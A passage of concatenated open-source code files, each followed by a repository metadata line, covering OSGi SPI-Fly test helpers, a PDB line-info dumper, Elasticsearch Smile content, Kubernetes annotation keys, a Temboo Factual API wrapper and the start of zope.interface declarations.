            // Strip trailing comments and surrounding whitespace.
            int hash = line.indexOf('#');
            if (hash >= 0) {
                line = line.substring(0, hash);
            }
            line = line.trim();
            if (line.length() > 0) {
                names.add(line);
            }
        }
    } finally {
        br.close();
    }

    return names;
}
/**
 * Creates a mock for a client bundle which holds the code that uses
 * ServiceLoader.load() or another SPI invocation.
 *
 * @param headers      manifest headers to report (typically containing the
 *                     SPI consumer header under test)
 * @param otherBundles other bundles that should be visible from the consumer's
 *                     BundleContext.getBundles()
 * @return the mocked, replayed consumer bundle
 */
private Bundle mockConsumerBundle(Dictionary<String, String> headers, Bundle ... otherBundles) {
    BundleContext bc = EasyMock.createMock(BundleContext.class);

    Bundle consumerBundle = EasyMock.createMock(Bundle.class);
    EasyMock.expect(consumerBundle.getSymbolicName()).andReturn("testConsumer").anyTimes();
    EasyMock.expect(consumerBundle.getHeaders()).andReturn(headers).anyTimes();
    EasyMock.expect(consumerBundle.getBundleContext()).andReturn(bc).anyTimes();
    // Long.MAX_VALUE keeps this id out of the range used by provider/system bundles.
    EasyMock.expect(consumerBundle.getBundleId()).andReturn(Long.MAX_VALUE).anyTimes();
    EasyMock.expect(consumerBundle.adapt(BundleRevision.class)).andReturn(null).anyTimes();
    EasyMock.replay(consumerBundle);

    // The context's getBundles() must include the consumer itself, so the
    // context mock is replayed only after the consumer mock exists.
    List<Bundle> allBundles = new ArrayList<Bundle>(Arrays.asList(otherBundles));
    allBundles.add(consumerBundle);
    EasyMock.expect(bc.getBundles()).andReturn(allBundles.toArray(new Bundle [] {})).anyTimes();
    EasyMock.replay(bc);

    return consumerBundle;
}
/**
 * Creates a mock of the OSGi system bundle: id 0, symbolic name
 * "system.bundle".
 */
private Bundle mockSystemBundle() {
    Bundle sys = EasyMock.createMock(Bundle.class);
    EasyMock.expect(sys.getSymbolicName()).andReturn("system.bundle").anyTimes();
    EasyMock.expect(sys.getBundleId()).andReturn(0L).anyTimes();
    EasyMock.replay(sys);
    return sys;
}
// A classloader that loads anything under the package for the given test subdirectory
// from itself and everything else from the parent. This is to mimic a bundle that
// holds a specific SPI implementation.
public static class TestProviderBundleClassLoader extends URLClassLoader {
    // Resource paths (relative, e.g. "META-INF/services/...") served by this loader.
    private final List<String> resources;
    // Resource-path prefix for this provider's package, e.g. "org/apache/aries/spifly/dynamic/impl1/".
    private final String prefix;
    // Same prefix in class-name form, e.g. "org.apache.aries.spifly.dynamic.impl1.".
    private final String classPrefix;
    // Cache of classes already defined here; defineClass() must not be called twice for a name.
    private final Map<String, Class<?>> loadedClasses = new ConcurrentHashMap<String, Class<?>>();

    public TestProviderBundleClassLoader(String subdir, String ... resources) {
        super(new URL [] {}, TestProviderBundleClassLoader.class.getClassLoader());

        this.prefix = TestProviderBundleClassLoader.class.getPackage().getName().replace('.', '/') + "/" + subdir + "/";
        this.classPrefix = prefix.replace('/', '.');
        this.resources = Arrays.asList(resources);
    }

    @Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        // Classes in this provider's package are defined locally; all others delegate to the parent.
        if (name.startsWith(classPrefix))
            return loadClassLocal(name);

        return super.loadClass(name);
    }

    @Override
    protected synchronized Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
        if (name.startsWith(classPrefix)) {
            Class<?> cls = loadClassLocal(name);
            if (resolve)
                resolveClass(cls);
            return cls;
        }

        return super.loadClass(name, resolve);
    }

    // Defines the named class from bytes read via the application classloader,
    // caching the result so repeated loads return the same Class object.
    protected Class<?> loadClassLocal(String name) throws ClassNotFoundException {
        Class<?> prevLoaded = loadedClasses.get(name);
        if (prevLoaded != null)
            return prevLoaded;

        URL res = TestProviderBundleClassLoader.class.getClassLoader().getResource(name.replace('.', '/') + ".class");
        try {
            byte[] bytes = Streams.suck(res.openStream());
            Class<?> cls = defineClass(name, bytes, 0, bytes.length);
            loadedClasses.put(name, cls);
            return cls;
        } catch (Exception e) {
            throw new ClassNotFoundException(name, e);
        }
    }

    @Override
    public URL findResource(String name) {
        // Registered resources are remapped into this provider's subdirectory.
        if (resources.contains(name)) {
            return getClass().getClassLoader().getResource(prefix + name);
        } else {
            return super.findResource(name);
        }
    }

    @Override
    public Enumeration<URL> findResources(String name) throws IOException {
        if (resources.contains(name)) {
            return getClass().getClassLoader().getResources(prefix + name);
        } else {
            return super.findResources(name);
        }
    }
}
// Minimal WovenClass implementation used to feed class bytes to the weaving hook
// and then load the (possibly rewritten) bytes for invocation.
private static class MyWovenClass implements WovenClass {
    byte [] bytes;                                   // current (possibly woven) class bytes
    final String className;
    final Bundle bundleContainingOriginalClass;
    List<String> dynamicImports = new ArrayList<String>();  // collects imports added by the hook
    boolean weavingComplete = false;

    private MyWovenClass(URL clazz, String name, Bundle bundle) throws Exception {
        bytes = Streams.suck(clazz.openStream());
        className = name;
        bundleContainingOriginalClass = bundle;
    }

    @Override
    public byte[] getBytes() {
        return bytes;
    }

    @Override
    public void setBytes(byte[] newBytes) {
        bytes = newBytes;
    }

    @Override
    public List<String> getDynamicImports() {
        return dynamicImports;
    }

    @Override
    public boolean isWeavingComplete() {
        return weavingComplete;
    }

    @Override
    public String getClassName() {
        return className;
    }

    @Override
    public ProtectionDomain getProtectionDomain() {
        return null;
    }

    @Override
    public Class<?> getDefinedClass() {
        // Define the current bytes in a fresh classloader; marks weaving as done,
        // mirroring the state a real framework would be in by the time callers ask.
        try {
            weavingComplete = true;
            return new MyWovenClassClassLoader(className, getBytes(), getClass().getClassLoader(), bundleContainingOriginalClass).loadClass(className);
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
            return null;
        }
    }

    @Override
    public BundleWiring getBundleWiring() {
        // Fresh single-use mock per call: each expectation may be consumed once.
        BundleWiring bw = EasyMock.createMock(BundleWiring.class);
        EasyMock.expect(bw.getBundle()).andReturn(bundleContainingOriginalClass);
        EasyMock.expect(bw.getClassLoader()).andReturn(getClass().getClassLoader());
        EasyMock.replay(bw);
        return bw;
    }
}
// Classloader that defines exactly one class (the woven one) from in-memory bytes
// and delegates everything else to its parent. Implements BundleReference so the
// woven code can discover the consumer bundle it "belongs" to.
private static class MyWovenClassClassLoader extends ClassLoader implements BundleReference {
    private final String className;
    private final Bundle bundle;
    private final byte [] bytes;
    private Class<?> wovenClass;   // lazily defined; defineClass must only run once

    public MyWovenClassClassLoader(String className, byte[] bytes, ClassLoader parent, Bundle bundle) {
        super(parent);

        this.className = className;
        this.bundle = bundle;
        this.bytes = bytes;
    }

    @Override
    protected synchronized Class<?> loadClass(String name, boolean resolve)
            throws ClassNotFoundException {
        if (name.equals(className)) {
            if (wovenClass == null)
                wovenClass = defineClass(className, bytes, 0, bytes.length);

            return wovenClass;
        } else {
            return super.loadClass(name, resolve);
        }
    }

    @Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        return loadClass(name, false);
    }

    @Override
    public Bundle getBundle() {
        return bundle;
    }
}
}
| WouterBanckenACA/aries | spi-fly/spi-fly-dynamic-bundle/src/test/java/org/apache/aries/spifly/dynamic/ClientWeavingHookTest.java | Java | apache-2.0 | 45,645 |
// Copyright 2012 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/experimental/pdb_dumper/pdb_module_info_stream_dumper.h"
#include "syzygy/common/align.h"
#include "syzygy/experimental/pdb_dumper/pdb_dump_util.h"
#include "syzygy/experimental/pdb_dumper/pdb_symbol_record_dumper.h"
#include "syzygy/pdb/pdb_dbi_stream.h"
#include "syzygy/pdb/pdb_stream.h"
#include "syzygy/pdb/pdb_symbol_record.h"
#include "syzygy/pe/cvinfo_ext.h"
namespace pdb {
namespace cci = Microsoft_Cci_Pdb;
namespace {
// Read the file checksum substream from a module info stream. The filenames
// used by this module will be stored in a map, keyed by each checksum record's
// offset within the substream (which is how line records refer back to files).
// @param file_names The map containing the filenames listed in the name stream
//     of the PDB.
// @param stream The stream containing the checksum substream, positioned at its
//     start.
// @param length The length of the checksum substream.
// @param module_files The map where the filenames should be saved.
// @returns true on success, false on error.
bool ReadFileChecksums(const OffsetStringMap& file_names,
                       pdb::PdbStream* stream,
                       size_t length,
                       OffsetStringMap* module_files) {
  DCHECK(stream != NULL);
  DCHECK(module_files != NULL);
  size_t base = stream->pos();
  size_t end = base + length;
  while (stream->pos() < end) {
    cci::CV_FileCheckSum checksum = {};
    // Offset of this record relative to the substream start; line records use
    // this value as their file index.
    size_t pos = stream->pos() - base;
    if (!stream->Read(&checksum, 1)) {
      LOG(ERROR) << "Unable to read file checksum.";
      return false;
    }

    // checksum.name is an offset into the PDB name stream.
    OffsetStringMap::const_iterator it(file_names.find(checksum.name));

    if (it == file_names.end()) {
      LOG(ERROR) << "There is a checksum reference for a file that is not in "
                 << "the list of files used by this module.";
      return false;
    }

    module_files->insert(std::make_pair(pos, it->second));

    // Skip the checksum and align.
    if (!stream->Seek(common::AlignUp(stream->pos() + checksum.len, 4))) {
      LOG(ERROR) << "Unable to seek past file checksum.";
      return false;
    }
  }
  return true;
}
// Dump the line information from a line information substream.
// @param file_names The map containing the filenames used by this module,
//     keyed by checksum-record offset (see ReadFileChecksums).
// @param out The output where the data should be dumped.
// @param stream The stream containing the line information, positioned at the
//     start of the substream.
// @param length The length of the line information substream.
// @param indent_level The indentation level to use.
// @returns true on success, false on error.
bool DumpLineInfo(const OffsetStringMap& file_names,
                  FILE* out,
                  PdbStream* stream,
                  size_t length,
                  uint8 indent_level) {
  DCHECK(stream != NULL);
  size_t base = stream->pos();

  // Read the header.
  cci::CV_LineSection line_section = {};
  if (!stream->Read(&line_section, 1)) {
    LOG(ERROR) << "Unable to read line section.";
    return false;
  }

  // Each iteration consumes one source-file group: its header, its line
  // records, and (if the flag is set) its column records.
  size_t end = base + length;
  while (stream->pos() < end) {
    cci::CV_SourceFile source_file = {};
    if (!stream->Read(&source_file, 1)) {
      LOG(ERROR) << "Unable to read source info.";
      return false;
    }

    std::vector<cci::CV_Line> lines(source_file.count);
    if (lines.size() && !stream->Read(&lines, lines.size())) {
      LOG(ERROR) << "Unable to read line records.";
      return false;
    }

    // Column records are only present when CV_LINES_HAVE_COLUMNS is set;
    // otherwise the vector stays value-initialized (all zeros), which the
    // offColumnStart != 0 test below relies on.
    std::vector<cci::CV_Column> columns(source_file.count);
    if ((line_section.flags & cci::CV_LINES_HAVE_COLUMNS) != 0 &&
        !stream->Read(&columns, columns.size())) {
      LOG(ERROR) << "Unable to read column records.";
      return false;
    }

    // source_file.index is the offset of this file's checksum record.
    OffsetStringMap::const_iterator it(file_names.find(source_file.index));

    if (it == file_names.end()) {
      LOG(ERROR) << "Unable to find an index in the list of filenames used by "
                 << "this module.";
      return false;
    }

    DumpIndentedText(out,
                     indent_level,
                     "Section %d, offset 0x%04X.\n",
                     line_section.sec,
                     line_section.off);
    for (size_t i = 0; i < lines.size(); ++i) {
      if (columns[i].offColumnStart != 0) {
        DumpIndentedText(out, indent_level,
                         "%s(%d, %d): line and column at %d:%04X.\n",
                         it->second.c_str(),
                         lines[i].flags & cci::linenumStart,
                         columns[i].offColumnStart,
                         line_section.sec,
                         line_section.off + lines[i].offset);
      } else {
        DumpIndentedText(out,
                         indent_level,
                         "%s(%d): line at %d:%04X.\n",
                         it->second.c_str(),
                         lines[i].flags & cci::linenumStart,
                         line_section.sec,
                         line_section.off + lines[i].offset);
      }
    }
  }

  return true;
}
// Dump the line information substream from a module info stream.
// @param name_map The map containing the filenames listed in the name stream of
//     the PDB.
// @param out The output where the data should be dumped.
// @param stream The stream containing the line information.
// @param start The position where the line information starts in the stream.
// @param lines_bytes The length of the line information substream.
// @param indent_level The level of indentation to use.
void DumpLines(const OffsetStringMap& name_map,
               FILE* out,
               pdb::PdbStream* stream,
               size_t start,
               size_t lines_bytes,
               uint8 indent_level) {
  DCHECK(stream != NULL);

  // Nothing to dump for modules without line info.
  if (lines_bytes == 0)
    return;

  if (!stream->Seek(start)) {
    LOG(ERROR) << "Unable to seek to line info.";
    return;
  }

  // The line information is arranged as a back-to-back run of {type, len}
  // prefixed chunks. The types are DEBUG_S_FILECHKSMS and DEBUG_S_LINES.
  // The first of these provides file names and a file content checksum, where
  // each record is identified by its offset into its chunk (excluding type
  // and len). A DEBUG_S_FILECHKSMS chunk must therefore precede the
  // DEBUG_S_LINES chunks that reference it.
  size_t end = start + lines_bytes;
  OffsetStringMap file_names;
  while (stream->pos() < end) {
    uint32 line_info_type = 0;
    uint32 length = 0;
    if (!stream->Read(&line_info_type, 1) || !stream->Read(&length, 1)) {
      LOG(ERROR) << "Unable to read line info signature.";
      return;
    }
    switch (line_info_type) {
      case cci::DEBUG_S_FILECHKSMS:
        // Populates file_names for subsequent DEBUG_S_LINES chunks.
        if (!ReadFileChecksums(name_map, stream, length, &file_names))
          return;
        break;
      case cci::DEBUG_S_LINES:
        if (!DumpLineInfo(file_names, out, stream, length, indent_level))
          return;
        break;
      default:
        LOG(ERROR) << "Unsupported line information type " << line_info_type
                   << ".";
        return;
    }
  }
}
} // namespace
// Dumps one module info stream: the module/object names, the C13 symbol
// records, and the line information substream.
// @param module_info Metadata for this module from the DBI stream.
// @param name_table The PDB name-stream contents (offset -> filename).
// @param out Where to write the dump.
// @param stream The module info stream itself, positioned at its start.
void DumpModuleInfoStream(const DbiModuleInfo& module_info,
                          const OffsetStringMap& name_table,
                          FILE* out,
                          PdbStream* stream) {
  DCHECK(stream != NULL);

  uint8 indent_level = 1;
  DumpIndentedText(out,
                   indent_level,
                   "Module name: %s\n",
                   module_info.module_name().c_str());
  DumpIndentedText(out,
                   indent_level,
                   "Object name: %s\n",
                   module_info.object_name().c_str());

  // The stream must start with the C13 format signature.
  uint32 type = 0;
  if (!stream->Read(&type, 1) || type != cci::C13) {
    LOG(ERROR) << "Unexpected symbol stream type " << type << ".";
    return;
  }

  // symbol_bytes includes the 4-byte signature just consumed.
  SymbolRecordVector symbols;
  ReadSymbolRecord(stream,
                   module_info.module_info_base().symbol_bytes - sizeof(type),
                   &symbols);

  DumpIndentedText(out, indent_level + 1, "Symbol records:\n");
  DumpSymbolRecords(out, stream, symbols, indent_level + 2);

  // The line info substream begins right after the symbol records.
  DumpIndentedText(out, indent_level + 1, "Lines:\n");
  DumpLines(name_table,
            out,
            stream,
            module_info.module_info_base().symbol_bytes,
            module_info.module_info_base().lines_bytes,
            indent_level + 2);
}
} // namespace pdb
| wangming28/syzygy | syzygy/experimental/pdb_dumper/pdb_module_info_stream_dumper.cc | C++ | apache-2.0 | 8,662 |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.common.xcontent.smile;
import com.fasterxml.jackson.core.JsonEncoding;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.dataformat.smile.SmileFactory;
import com.fasterxml.jackson.dataformat.smile.SmileGenerator;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.io.FastStringReader;
import org.elasticsearch.common.xcontent.XContent;
import org.elasticsearch.common.xcontent.XContentBuilder;
import org.elasticsearch.common.xcontent.XContentGenerator;
import org.elasticsearch.common.xcontent.XContentParser;
import org.elasticsearch.common.xcontent.XContentType;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.Reader;
/**
* A Smile based content implementation using Jackson.
*/
/**
 * A Smile based content implementation using Jackson.
 */
public class SmileXContent implements XContent {

    public static XContentBuilder contentBuilder() throws IOException {
        return XContentBuilder.builder(smileXContent);
    }

    final static SmileFactory smileFactory;
    public final static SmileXContent smileXContent;

    static {
        smileFactory = new SmileFactory();
        smileFactory.configure(SmileGenerator.Feature.ENCODE_BINARY_AS_7BIT, false); // for now, this is an overhead, might make sense for web sockets
        smileFactory.configure(SmileFactory.Feature.FAIL_ON_SYMBOL_HASH_OVERFLOW, false); // this trips on many mappings now...
        // Do not automatically close unclosed objects/arrays in com.fasterxml.jackson.dataformat.smile.SmileGenerator#close() method
        smileFactory.configure(JsonGenerator.Feature.AUTO_CLOSE_JSON_CONTENT, false);
        // The singleton must be created after the factory is fully configured.
        smileXContent = new SmileXContent();
    }

    // Singleton: use the shared smileXContent instance.
    private SmileXContent() {
    }

    @Override
    public XContentType type() {
        return XContentType.SMILE;
    }

    @Override
    public byte streamSeparator() {
        // 0xFF is used to delimit consecutive Smile documents in a stream.
        return (byte) 0xFF;
    }

    @Override
    public XContentGenerator createGenerator(OutputStream os, String[] filters, boolean inclusive) throws IOException {
        return new SmileXContentGenerator(smileFactory.createGenerator(os, JsonEncoding.UTF8), os, filters, inclusive);
    }

    @Override
    public XContentParser createParser(String content) throws IOException {
        return new SmileXContentParser(smileFactory.createParser(new FastStringReader(content)));
    }

    @Override
    public XContentParser createParser(InputStream is) throws IOException {
        return new SmileXContentParser(smileFactory.createParser(is));
    }

    @Override
    public XContentParser createParser(byte[] data) throws IOException {
        return new SmileXContentParser(smileFactory.createParser(data));
    }

    @Override
    public XContentParser createParser(byte[] data, int offset, int length) throws IOException {
        return new SmileXContentParser(smileFactory.createParser(data, offset, length));
    }

    @Override
    public XContentParser createParser(BytesReference bytes) throws IOException {
        // Parse directly from the backing array when available to avoid a stream copy.
        if (bytes.hasArray()) {
            return createParser(bytes.array(), bytes.arrayOffset(), bytes.length());
        }
        return createParser(bytes.streamInput());
    }

    @Override
    public XContentParser createParser(Reader reader) throws IOException {
        return new SmileXContentParser(smileFactory.createParser(reader));
    }
}
| camilojd/elasticsearch | core/src/main/java/org/elasticsearch/common/xcontent/smile/SmileXContent.java | Java | apache-2.0 | 4,170 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package api
const (
	// MirrorPodAnnotationKey represents the annotation key set by kubelets when creating mirror pods
	MirrorPodAnnotationKey string = "kubernetes.io/config.mirror"

	// TolerationsAnnotationKey represents the key of tolerations data (json serialized)
	// in the Annotations of a Pod.
	TolerationsAnnotationKey string = "scheduler.alpha.kubernetes.io/tolerations"

	// TaintsAnnotationKey represents the key of taints data (json serialized)
	// in the Annotations of a Node.
	TaintsAnnotationKey string = "scheduler.alpha.kubernetes.io/taints"

	// SeccompPodAnnotationKey represents the key of a seccomp profile applied
	// to all containers of a pod.
	SeccompPodAnnotationKey string = "seccomp.security.alpha.kubernetes.io/pod"

	// SeccompContainerAnnotationKeyPrefix represents the key of a seccomp profile applied
	// to one container of a pod.
	SeccompContainerAnnotationKeyPrefix string = "container.seccomp.security.alpha.kubernetes.io/"

	// CreatedByAnnotation represents the key used to store the spec(json)
	// used to create the resource.
	CreatedByAnnotation = "kubernetes.io/created-by"

	// PreferAvoidPodsAnnotationKey represents the key of preferAvoidPods data (json serialized)
	// in the Annotations of a Node.
	PreferAvoidPodsAnnotationKey string = "scheduler.alpha.kubernetes.io/preferAvoidPods"

	// SysctlsPodAnnotationKey represents the key of sysctls which are set for the infrastructure
	// container of a pod. The annotation value is a comma separated list of sysctl_name=value
	// key-value pairs. Only a limited set of whitelisted and isolated sysctls is supported by
	// the kubelet. Pods with other sysctls will fail to launch.
	SysctlsPodAnnotationKey string = "security.alpha.kubernetes.io/sysctls"

	// UnsafeSysctlsPodAnnotationKey represents the key of sysctls which are set for the infrastructure
	// container of a pod. The annotation value is a comma separated list of sysctl_name=value
	// key-value pairs. Unsafe sysctls must be explicitly enabled for a kubelet. They are properly
	// namespaced to a pod or a container, but their isolation is usually unclear or weak. Their use
	// is at-your-own-risk. Pods that attempt to set an unsafe sysctl that is not enabled for a kubelet
	// will fail to launch.
	UnsafeSysctlsPodAnnotationKey string = "security.alpha.kubernetes.io/unsafe-sysctls"

	// ObjectTTLAnnotationKey represents a suggestion for kubelet for how long it can cache
	// an object (e.g. secret, config map) before fetching it again from apiserver.
	// This annotation can be attached to node.
	ObjectTTLAnnotationKey string = "node.alpha.kubernetes.io/ttl"

	// AffinityAnnotationKey represents the key of affinity data (json serialized)
	// in the Annotations of a Pod.
	// TODO: remove when alpha support for affinity is removed
	AffinityAnnotationKey string = "scheduler.alpha.kubernetes.io/affinity"

	// NonConvertibleAnnotationPrefix is the annotation key prefix used to identify
	// non-convertible json paths.
	NonConvertibleAnnotationPrefix = "non-convertible.kubernetes.io"
)
| danielromlein/dashboard | vendor/k8s.io/client-go/pkg/api/annotation_key_constants.go | GO | apache-2.0 | 3,584 |
# -*- coding: utf-8 -*-
###############################################################################
#
# FilterPlacesByTopLevelCategory
# Find places by top-level category and near specified latitude, longitude coordinates.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
    """
    Finds places belonging to a Factual top-level category near the given
    latitude/longitude coordinates.
    """

    def __init__(self, temboo_session):
        """
        Create a new instance of the FilterPlacesByTopLevelCategory Choreo.

        temboo_session -- a TembooSession object containing a valid set of
                          Temboo credentials.
        """
        choreo_path = '/Library/Factual/FilterPlacesByTopLevelCategory'
        super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, choreo_path)

    def new_input_set(self):
        # Factory for the choreo-specific input container.
        return FilterPlacesByTopLevelCategoryInputSet()

    def _make_result_set(self, result, path):
        # Wrap raw execution output in the choreo-specific result set.
        return FilterPlacesByTopLevelCategoryResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Track an asynchronous execution of this choreo.
        return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.

    Each setter below simply stores the value under the corresponding input
    name via InputSet._set_input(); validation happens server-side.
    """
    def set_APIKey(self, value):
        """
        Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)
    def set_APISecret(self, value):
        """
        Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)
    def set_Category(self, value):
        """
        Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)
    def set_Latitude(self, value):
        """
        Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)
    def set_Longitude(self, value):
        """
        Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)
    def set_Query(self, value):
        """
        Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)
    def set_Radius(self, value):
        """
        Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
        """
        super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the FilterPlacesByTopLevelCategory Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # Parse a JSON string into Python objects.  NOTE: the parameter name
        # shadows the builtin ``str`` within this method; kept as-is because
        # this file is Temboo-generated and callers may pass it by keyword.
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Factual.)
        """
        # Returns None when the execution produced no "Response" output.
        return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
    # Execution handle: pairs a running Choreo with its typed ResultSet.
    def _make_result_set(self, response, path):
        return FilterPlacesByTopLevelCategoryResultSet(response, path)
| jordanemedlock/psychtruths | temboo/core/Library/Factual/FilterPlacesByTopLevelCategory.py | Python | apache-2.0 | 5,132 |
/*
* Copyright 2004-2009 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.compass.annotations.test.property;
import java.util.List;
import org.compass.annotations.Searchable;
import org.compass.annotations.SearchableId;
import org.compass.annotations.SearchableProperty;
/**
 * Minimal annotated fixture for Compass searchable-property tests: an
 * entity with a searchable id and a {@code List<String>} property.
 *
 * @author kimchy
 */
@Searchable
public class A {
    // Identifier field marked as the searchable id.
    @SearchableId
    long id;
    // Multi-valued searchable property (list of strings).
    @SearchableProperty
    List<String> values;
}
| baboune/compass | src/main/test/org/compass/annotations/test/property/A.java | Java | apache-2.0 | 973 |
package main
import "github.com/mackerelio/mackerel-plugin-gearmand/lib"
// main delegates straight to the plugin implementation in the
// mpgearmand package.
func main() {
	mpgearmand.Do()
}
| mackerelio/mackerel-agent-plugins | mackerel-plugin-gearmand/main.go | GO | apache-2.0 | 108 |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""Implementation of interface declarations
There are three flavors of declarations:
- Declarations are used to simply name declared interfaces.
- ImplementsDeclarations are used to express the interfaces that a
class implements (that instances of the class provides).
Implements specifications support inheriting interfaces.
- ProvidesDeclarations are used to express interfaces directly
provided by objects.
"""
from __future__ import absolute_import
__docformat__ = 'restructuredtext'
import sys
from types import FunctionType
from types import MethodType
from types import ModuleType
import weakref
from . import advice as advicemod
from .interface import InterfaceClass
from .interface import SpecificationBase
from .interface import Specification
from ._compat import CLASS_TYPES as DescriptorAwareMetaClasses
from ._compat import PYTHON3
# Registry of class-implementation specifications, keyed by class.
# Used for builtins and other types whose __implemented__ attribute
# cannot be set directly.
BuiltinImplementationSpecifications = {}
# Message templates for the Python-2-only class-advice APIs.
_ADVICE_ERROR = ('Class advice impossible in Python3. '
                 'Use the @%s class decorator instead.')
_ADVICE_WARNING = ('The %s API is deprecated, and will not work in Python3 '
                   'Use the @%s class decorator instead.')
class named(object):
    """Decorator that tags an object with a component name.

    Applying ``@named("foo")`` stores ``"foo"`` on the decorated
    object's ``__component_name__`` attribute and hands the object
    back unchanged, so the decorator is transparent.
    """

    def __init__(self, name):
        # Remember the component name to apply later.
        self.name = name

    def __call__(self, ob):
        # Stamp the stored name onto the decorated object.
        setattr(ob, '__component_name__', self.name)
        return ob
class Declaration(Specification):
    """Interface declarations

    A simple named collection of interfaces; the base for the
    implements/provides declaration classes below.
    """
    def __init__(self, *interfaces):
        # Arguments may be interfaces, declarations, or nested sequences;
        # _normalizeargs flattens them into a flat list of specs.
        Specification.__init__(self, _normalizeargs(interfaces))
    def changed(self, originally_changed):
        # Propagate the change notification, then drop the cached
        # attribute map (if any) so it is lazily recomputed.
        Specification.changed(self, originally_changed)
        try:
            del self._v_attrs
        except AttributeError:
            # No cache had been built yet; nothing to invalidate.
            pass
    def __contains__(self, interface):
        """Test whether an interface is in the specification
        """
        return self.extends(interface) and interface in self.interfaces()
    def __iter__(self):
        """Return an iterator for the interfaces in the specification
        """
        return self.interfaces()
    def flattened(self):
        """Return an iterator of all included and extended interfaces
        """
        return iter(self.__iro__)
    def __sub__(self, other):
        """Remove interfaces from a specification
        """
        # Keep only our interfaces that do not extend (or equal) any
